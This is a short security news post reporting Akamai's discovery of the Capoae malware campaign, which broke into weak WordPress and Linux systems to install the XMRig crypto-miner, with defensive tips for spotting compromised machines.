1 min read

New Malware Campaign Targets Linux and Web Apps to Install Crypto-Mining Software

Silviu STAHIE

September 23, 2021

Ad One product to protect all your devices, without slowing them down.
Free 90-day trial
New Malware Campaign Targets Linux and Web Apps to Install Crypto-Mining Software

Security researchers have identified a new campaign pushing malware that targets Linux devices and specific web applications with the purpose of deploying crypto-mining apps.

Taking over hardware to deploy crypto-mining apps is not uncommon. Criminals try to compromise systems so they can work from them to cut operational costs. Crypto mining is an expensive endeavor, and using other people's systems reduces almost all costs.

Criminals tend to follow a similar path, and it starts by identifying poorly protected devices and services, usually with default or weak credentials. Bitdefender identified a similar campaign a few months ago, with attackers deploying Monero mining malware via weak SSH credentials.

The campaign Akamai security researchers discovered is more complex, as criminals tried a lot harder to obfuscate their activity on compromised systems. Like Bitdefender, Akamai used specially designed honeypots to track the malware's behavior once it entered the system.

The attackers deployed a PHP malware, which the researchers named Capoae. The systems are likely compromised via an infected WordPress plugin named 'download-monitor."

"Download-monitor had been installed after the honeypot's weak WordPress admin credentials had been guessed," said the Akamai researchers. "A 3MB UPX packed Golang binary was also downloaded to /tmp.  Upon examination, it was clear the malware had some decryption functionality and an encrypted file stored in another directory."

The goal is to deploy a Golang binary that eventually uses a number of known Oracle Weblogic to infect systems with weak credentials and deploy XMRig, a crypto-mining software. Of course, it also employs numerous obfuscation tactics in an attempt to stay under the radar.

"Keeping an eye out for higher than normal system resource consumption, odd/unexpected running processes, suspicious artifacts (files, crontab entries, SSH keys, etc.), and suspicious access log entries, etc., will help you potentially identify compromised machines" the researchers also said. A full list of indicators of compromise is also available.

tags


Author



Right now

Top posts

Ultimate Privacy Guide for Your Facebook Account

Ultimate Privacy Guide for Your Facebook Account

August 31, 2021

6 min read
7 Signs It’s Time to Use Parental Controls On Your Family’s Devices

7 Signs It’s Time to Use Parental Controls On Your Family’s Devices

August 27, 2021

2 min read
Your Netflix Account May Be on Sale on Darkweb. Protect It

Your Netflix Account May Be on Sale on Darkweb. Protect It

August 13, 2021

3 min read
E-mails claiming your computer was hacked and your privacy exposed - what you need to know (spoiler: you can relax - they’re bluffing)

E-mails claiming your computer was hacked and your privacy exposed - what you need to know (spoiler: you can relax - they’re bluffing)

July 29, 2021

5 min read
Watch Out for These Ongoing Bank of America Phishing Campaigns Targeting Customers in the US

Watch Out for These Ongoing Bank of America Phishing Campaigns Targeting Customers in the US

July 16, 2021

3 min read
How to protect yourself against cyberstalking

How to protect yourself against cyberstalking

July 06, 2021

2 min read

FOLLOW US ON

SOCIAL MEDIA


You might also like

Man who "scraped and sold 178 million users' data" is sued by Facebook Man who "scraped and sold 178 million users' data" is sued by Facebook
Graham CLULEY

October 26, 2021

2 min read
Microsoft Teams Rolls Out End-to-End Encryption Microsoft Teams Rolls Out End-to-End Encryption
Silviu STAHIE

October 25, 2021

1 min read
Stay Updated to Keep Ahead of Cyber Threats – Updating Chameleon Explains Stay Updated to Keep Ahead of Cyber Threats – Updating Chameleon Explains
Filip TRUȚĂ

October 25, 2021

2 min read